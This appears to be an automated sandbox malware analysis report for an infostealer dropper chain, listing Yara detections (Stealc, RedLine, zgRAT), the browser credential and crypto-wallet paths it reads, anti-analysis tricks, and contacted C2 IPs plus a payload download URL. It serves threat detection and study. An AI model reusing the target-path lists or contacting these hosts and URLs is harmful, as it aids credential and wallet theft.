Source: Yara match File source: 0000001D.00000002.2790303131.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1942187223.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1841769125.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2010739525.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.00000000005DA000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q5C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.walletLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.walletLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q9C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 66ed86be077bb_12.exe.27.dr String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
OS version to string mapping found (often used in BOTs)
Source: 6dbb7bdf47.exe Binary or memory string: WIN_81
Source: 6dbb7bdf47.exe Binary or memory string: WIN_XP
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: 6dbb7bdf47.exe Binary or memory string: WIN_XPe
Source: 6dbb7bdf47.exe Binary or memory string: WIN_VISTA
Source: 6dbb7bdf47.exe Binary or memory string: WIN_7
Source: 6dbb7bdf47.exe Binary or memory string: WIN_8
Yara detected Credential Stealer
Source: Yara match File source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 31.2.gold.exe.3775570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.gold.exe.3775570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gold.exe PID: 4516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2516, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
Yara detected Stealc
Source: Yara match File source: 15.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.3ec4738210.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.b74664dd7e.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2669801518.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352900147.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2350817392.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.0000000000201000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2586371888.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1644238090.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1976198696.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1756168232.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2790303131.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1942187223.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.1841769125.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2010739525.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2583706589.00000000005DA000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2280696293.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1971865363.000000000029A000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 6220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3ec4738210.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b74664dd7e.exe PID: 4500, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 17_2_00E71204
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 17_2_00E71806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1516777 Sample: file.exe Startdate: 24/09/2024 Architecture: WINDOWS Score: 100 78 www.leopardi.nl 2->78 80 solutionhub.cc 2->80 82 garageserviceoperation.com 2->82 106 Suricata IDS alerts for network traffic 2->106 108 Found malware configuration 2->108 110 Malicious sample detected (through community Yara rule) 2->110 112 22 other signatures 2->112 10 skotes.exe 2 26 2->10         started        15 file.exe 5 2->15         started        17 3ec4738210.exe 2->17         started        19 6 other processes 2->19 signatures3 process4 dnsIp5 92 185.215.113.16, 49723, 49744, 49758 WHOLESALECONNECTIONSNL Portugal 10->92 94 185.215.113.43, 49706, 49707, 49708 WHOLESALECONNECTIONSNL Portugal 10->94 96 185.215.113.103, 49710, 49714, 49715 WHOLESALECONNECTIONSNL Portugal 10->96 64 C:\Users\user\AppData\...\610cd559ac.exe, PE32 10->64 dropped 66 C:\Users\user\AppData\...\6dbb7bdf47.exe, PE32 10->66 dropped 68 C:\Users\user\AppData\...\3ec4738210.exe, PE32 10->68 dropped 74 4 other malicious files 10->74 dropped 144 Creates multiple autostart registry keys 10->144 146 Hides threads from debuggers 10->146 148 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->148 21 610cd559ac.exe 10->21         started        25 3ec4738210.exe 12 10->25         started        28 b74664dd7e.exe 12 10->28         started        30 6dbb7bdf47.exe 10->30         started        70 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->70 dropped 72 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->72 dropped 150 Detected unpacking (changes PE section rights) 15->150 152 Tries to evade debugger and weak emulator (self modifying code) 15->152 154 Tries to detect virtualization through RDTSC time measurements 15->154 32 skotes.exe 15->32         started        156 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->156 34 WerFault.exe 17->34         started        file6 signatures7 process8 dnsIp9 54 C:\Users\user\AppData\Local\...\axplong.exe, PE32 21->54 dropped 114 Detected unpacking (changes PE section rights) 21->114 116 Tries to evade debugger and weak emulator (self modifying code) 21->116 118 Hides threads from debuggers 21->118 36 axplong.exe 21->36         started        90 185.215.113.37, 49712, 49751, 49793 WHOLESALECONNECTIONSNL Portugal 25->90 120 Antivirus detection for dropped file 25->120 122 Machine Learning detection for dropped file 25->122 124 Tries to detect sandboxes / dynamic malware analysis system (registry check) 25->124 41 WerFault.exe 25->41         started        126 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 28->126 43 WerFault.exe 28->43         started        128 Binary is likely a compiled AutoIt script file 30->128 130 Found API chain indicative of debugger detection 30->130 132 Found API chain indicative of sandbox detection 30->132 134 Multi AV Scanner detection for dropped file 32->134 file10 signatures11 process12 dnsIp13 84 103.130.147.211 MYREPUBLIC-AS-IDPTEkaMasRepublikID Turkey 36->84 86 185.215.113.100 WHOLESALECONNECTIONSNL Portugal 36->86 88 5 other IPs or domains 36->88 56 C:\Users\user\AppData\Local\...\Blenar.exe, PE32 36->56 dropped 58 C:\Users\user\AppData\...\newbundle2.exe, PE32 36->58 dropped 60 C:\Users\user\AppData\Local\Temp\...\2.exe, PE32 36->60 dropped 62 23 other malicious files 36->62 dropped 136 Detected unpacking (changes PE section rights) 36->136 138 Tries to detect sandboxes and other dynamic analysis tools (window names) 36->138 140 Creates multiple autostart registry keys 36->140 142 4 other signatures 36->142 45 gold.exe 36->45         started        file14 signatures15 process16 signatures17 158 Antivirus detection for dropped file 45->158 160 Multi AV Scanner detection for dropped file 45->160 162 Writes to foreign memory regions 45->162 164 2 other signatures 45->164 48 RegAsm.exe 45->48         started        52 conhost.exe 45->52         started        process18 dnsIp19 76 95.179.250.45, 26212, 49760, 49763 AS-CHOOPAUS Netherlands 48->76 98 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 48->98 100 Installs new ROOT certificates 48->100 102 Found many strings related to Crypto-Wallets (likely being stolen) 48->102 104 3 other signatures 48->104 signatures20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
194.116.215.195
 unknown unknown
44676 VMAGE-ASRU false
185.215.113.100
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.26
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
46.19.218.204
 www.leopardi.nl Netherlands
20559 FUNDAMENTS-ASNL false
103.130.147.211
 unknown Turkey
63859 MYREPUBLIC-AS-IDPTEkaMasRepublikID true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
147.45.44.104
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
95.179.250.45
 unknown Netherlands
20473 AS-CHOOPAUS true
185.215.113.117
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
185.215.113.103
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted Domains

Name IP Active
www.leopardi.nl 46.19.218.204 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe false
  • Avira URL Cloud: safe
 unknown
http://185.215.113.37/ true
  • Avira URL Cloud: malware
 unknown